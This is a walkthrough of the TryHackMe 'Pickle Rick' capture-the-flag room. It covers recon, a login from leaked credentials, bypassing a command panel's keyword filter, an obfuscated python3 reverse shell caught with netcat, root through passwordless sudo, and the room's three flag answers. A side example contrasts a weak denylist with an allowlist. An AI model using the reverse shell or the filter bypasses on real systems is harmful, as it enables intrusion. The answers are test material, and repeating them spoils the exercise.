THM_PickleRick_Walkthrough
Simple Walkthrough for a TryHackMe Room: Pickle Rick
performed by: jb-williams
To access the box, put the machine's IP into this URL: `https://<IP>.p.thmlabs.com`
- Travelling to the site, we can start gathering information.
- First, it is always good to View Page Source to see if there are any information disclosures accidentally left in the HTML source code.
- Doing so, you can see a comment left in the source code reminding Rick that the username for his account is `R1ckRul3s`.
- Now we scan the box with nmap to see what info we can gather:
```
nmap -v -sC -sV -oN nmap/initial <IP>
```
- Found OpenSSH 7.2p2 on port `22`.
- Found Apache httpd 2.4.18 on port `80`.
- While nmap was running I went to the site to check whether there was anything interesting in the `robots.txt` file.
- There was a single 'word' in that file: `Wubbalubbadubdub`
- I like to use `feroxbuster` instead of `gobuster`, just preference. So I ran my normal `feroxbuster` command, which also routes it through my web proxy `zaproxy` (similar to Burp) so I can capture and reuse any requests:
```
feroxbuster -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -o ferox-initial.txt -x php,php5,htm,html,html5,js,txt -t 15 -L 15 -s 200,302,304 -P http://localhost:8080 -e -u http://10.10.24.209/
```
- Found a hidden `/login.php` route and began fuzzing Rick's login with username `R1ckRul3s`.
- After some time fuzzing the password with `zaproxy` and poking around, I got back to `/robots.txt` and was reminded about `Wubbalubbadubdub`.
- I was able to log in to Rick's account with username `R1ckRul3s` and password `Wubbalubbadubdub`.
- Logging in brought me to `/portal.php`, with the first page being a Command Panel.
- Immediately attempted to run `ls` and saw that it did list out the directory contents:
```
Sup3rS3cretPickl3Ingred.txt
assets
clue.txt
denied.php
index.html
login.php
portal.php
robots.txt
```
- Trying to `cat` out any file responds with that command being disabled.
- A go-to for me, which seems a little long but usually works, is this bash syntax (use an absolute path if necessary; by default it reads files in the current working directory):
```
while read line; do echo $line; done < $FILE
```
ex:
```
while read line; do echo $line; done < Sup3rS3cretPickl3Ingred.txt
```
- Did that with both `Sup3rS3cretPickl3Ingred.txt` (our answer for question one) and `clue.txt` (clue to the next ingredient).
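The panel's `cat` block is a keyword denylist, which is why a shell builtin (and the `p\ython3` spelling further down) still gets through. As an added example that is not part of this walkthrough or the room's code, the snippet below models that weak check next to an allowlist that maps a fixed set of programs to absolute paths and runs them without a shell; the denied keywords and allowed programs are assumptions for illustration.

```python
import shlex
import subprocess

# Assumed denylist modelled on the panel's observed behaviour (refuses "cat",
# and "python3" given that it had to be obfuscated to run).
DENIED_KEYWORDS = {"cat", "python3"}

# Hardened alternative: fixed allowlist of programs, executed without a shell.
ALLOWED_PROGRAMS = {"ls": "/bin/ls", "pwd": "/bin/pwd"}
SHELL_META = set(";|&<>`$(){}*?\n")


def denylist_allows(cmd: str) -> bool:
    """Weak check: reject only if a denied word appears literally in the command."""
    return not any(word in cmd for word in DENIED_KEYWORDS)


def allowlist_parse(cmd: str):
    """Return an argv list only for a plain allowlisted program with
    relative, non-traversing arguments and no shell metacharacters; else None."""
    if any(ch in SHELL_META for ch in cmd):
        return None
    try:
        argv = shlex.split(cmd)
    except ValueError:
        return None
    if not argv or argv[0] not in ALLOWED_PROGRAMS:
        return None
    if any(arg.startswith("/") or ".." in arg for arg in argv[1:]):
        return None
    return [ALLOWED_PROGRAMS[argv[0]], *argv[1:]]


def run_hardened(cmd: str, cwd: str = ".") -> str:
    """Run an allowlisted command via execve (shell=False) or refuse it."""
    argv = allowlist_parse(cmd)
    if argv is None:
        return "Command disabled"
    return subprocess.run(argv, capture_output=True, text=True, cwd=cwd).stdout


if __name__ == "__main__":
    for c in ("ls", "cat clue.txt",
              "while read line; do echo $line; done < clue.txt",
              "p\\ython3 -c 'import os'"):
        print(f"{c!r:52} denylist={denylist_allows(c)} "
              f"allowlist={allowlist_parse(c) is not None}")
```

Running it shows the denylist letting both bypasses through while the allowlist refuses everything except the plain `ls`.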
- Tried some different commands and found that this slightly obfuscated python3 reverse shell worked. To get the shell, on the local machine I ran:
```
nc -lnvp 4444
```
and in the command panel I pasted this (make sure you change the IP and port to your own):
```
p\ython3 -c 'import os,pty,socket;s=socket.socket();s.connect(("<IP>",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("bash")'
```
- Once I had a shell on the machine I ran `ls /home` to see any users' home directories.
- Noticed Rick's, so I ran `ls -la /home/rick` and saw `second ingredients`.
- Seeing the output that way let me know it was a file with a space in the name, so to cat it out I ran:
```
cat /home/rick/second\ ingredients
```
- And that got us the answer to the second question.
- Gathering more information about the system, I happened to run `sudo -l` and saw that user `www-data` (the user I was running as) could run any sudo command without a password, so I ran:
```
sudo su
```
- And was given `root` access.
- I traversed over to the `/root` dir, listed its contents and saw `3rd.txt`.
- After using `cat` to display `3rd.txt`, we got the answer for the last question.
What is the first ingredient Rick needs?
- Answer: `mr. meeseek hair`
What's the second ingredient Rick needs?
- Answer: `1 jerry tear`
What's the final ingredient Rick needs?
- Answer: `fleep juice`
written and performed by jb-williams - github
2023-04-13 10:04